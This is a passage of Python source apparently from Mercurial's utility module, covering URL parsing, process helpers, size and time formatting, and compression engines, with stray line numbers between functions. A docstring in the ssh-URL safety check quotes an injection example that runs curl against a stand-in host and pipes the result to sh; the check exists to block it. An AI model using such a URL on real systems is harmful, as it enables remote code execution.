        # iterator for pipes/sockets/ttys (note: 'file' is Python 2 only)
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2949
def iterlines(iterator):
    """Yield every line of every chunk produced by iterator."""
    for block in iterator:
        blocklines = block.splitlines()
        for line in blocklines:
            yield line
2954
def expandpath(path):
    """Expand environment variables and '~' constructs in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2957
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            # other frozen builds (e.g. py2exe): the binary itself is hg
            return [pycompat.sysexecutable]
    return gethgcmd()
2972
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # reaps the child and records its (pid, status) via the closure
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                # child died before the condition was ever met
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore the previous SIGCHLD disposition, if we replaced it
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
3007
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda text: text)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        # a doubled prefix collapses to a single literal prefix character;
        # note this mutates the caller-supplied mapping
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(br'%s(%s)' % (prefix, patterns))
    return matcher.sub(lambda m: fn(mapping[m.group()[1:]]), s)
3032
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    # integers and numeric strings pass straight through
    try:
        return int(port)
    except ValueError:
        pass

    # otherwise treat the value as a service name, e.g. 'http' -> 80
    try:
        servicename = pycompat.sysstr(port)
        return socket.getservbyname(servicename)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
3049
# Recognized spellings for boolean configuration values.
_booleans = dict.fromkeys(('1', 'yes', 'true', 'on', 'always'), True)
_booleans.update(dict.fromkeys(('0', 'no', 'false', 'off', 'never'), False))

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    # comparison is case-insensitive, so e.g. 'Yes'/'TRUE' are accepted
    return _booleans.get(s.lower())
3060
3061 _hextochr = dict((a + b, chr(int(a + b, 16)))
3062 for a in string.hexdigits for b in string.hexdigits)
3063
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unescaped by quote() in user/passwd components
    _safechars = "!~*'()+"
    # characters left unescaped in path/fragment components
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        # keep the unparsed input for localpath() fallback
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # only components that were actually parsed appear in the repr
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals are emitted as-is, not percent-quoted
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # serialize without credentials, restoring them afterwards
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        # non-local URL: return the input string untouched
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3367
def hasscheme(path):
    """Report whether path parses with an explicit URL scheme."""
    parsed = url(path)
    return bool(parsed.scheme)
3370
def hasdriveletter(path):
    """Report whether path starts with a Windows drive letter ('X:')."""
    if not path:
        # preserve the original falsy return value ('' or None)
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3373
def urllocalpath(path):
    """Return the local filesystem path for path, parsed leniently."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3376
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # unquote first so percent-encoded dashes cannot sneak past the check
    path = urlreq.unquote(path)
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
3391
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3398
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes via url.__bytes__, matching hidepassword() above.  The
    # previous 'str(u)' went through encoding.strmethod and produced a
    # native str on Python 3, inconsistent with every other URL helper.
    return bytes(u)
3404
# Human-readable duration formatter.  Each row appears to be a
# (threshold, multiplier, format) tuple consumed by unitcountfn (defined
# earlier in this file) to render seconds down to nanoseconds —
# NOTE(review): confirm the tuple semantics against unitcountfn.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3420
# Current indentation (in spaces) for nested @timed reports.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        indent = 2
        begin = timer()
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= indent
            report = '%s%s: %s\n' % (' ' * _timenesting[0],
                                     func.__name__, timecount(duration))
            stderr.write(report)
    return wrapper
3447
# Recognized size suffixes; multi-character suffixes such as 'kb' must be
# probed even though the single-letter forms come first, because a string
# ending in 'kb' does not end in any single-letter suffix above it.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    text = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if text.endswith(suffix):
                value = float(text[:-len(suffix)])
                return int(value * multiplier)
        return int(text)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3469
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        # source is only used as the sort key when the hooks run
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda entry: entry[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3487
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # [:-skip - 1] always drops at least this function's own frame (skip=0
    # gives [:-1]); [-depth:] with the default depth=0 is [-0:], i.e. the
    # whole list, so depth=0 means "no limit".
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        # widest file:line string, used to align the function-name column
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3510
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # flush the other stream first so interleaved output stays ordered
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3525
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: honour the skip state
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    self.addpath(fname)
        else:
            for fname in map:
                self.addpath(fname)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # every ancestor of base was counted when base first
                # appeared, so we can stop after bumping this one
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # mirror of addpath: ancestors keep their counts
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3561
# If the C parsers module provides a dirs type, it replaces the pure
# Python class above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3564
def finddirs(path):
    """Yield each ancestor directory of a '/'-separated path, deepest first.

    A path with no '/' yields nothing.
    """
    sep = path.rfind('/')
    while sep >= 0:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3570
# compression code

# Role constants used when querying wire-protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# (engine name, server advertisement priority, client advertisement
# priority); see compressionengine.wireprotosupport() for semantics.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3579
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # register the engine itself only after all uniqueness checks pass
        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

# the singleton all engines register against
compengines = compressormanager()
3735
# Note: the per-engine bundletype() docstrings below double as user-facing
# help text (see that method's docstring), so subclasses should keep them
# user-readable.
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3852
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        # marker byte identifying zlib-compressed revlog chunks
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # level -1 is zlib's default compression level
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # very small inputs are stored uncompressed
            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                # only use the result if it actually saved space
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3939
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # level 9 is bz2's maximum (and its module default)
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer and emit nothing for a given chunk
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3982
# Decompression-only engine for legacy streams whose 'BZ' magic was
# stripped; it has no user-facing bundle name.
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
4003
class _noopengine(compressionengine):
    """Pass-through engine that performs no compression at all."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # revlogheader is deliberately not implemented; the revlog class
    # special-cases uncompressed chunks itself.

    def compressstream(self, it, opts=None):
        # Identity transform: hand the iterator back untouched.
        return it

    def decompressorreader(self, fh):
        # Identity transform: the file object already yields raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Returning None tells the revlog to store the chunk as-is.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
4038
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
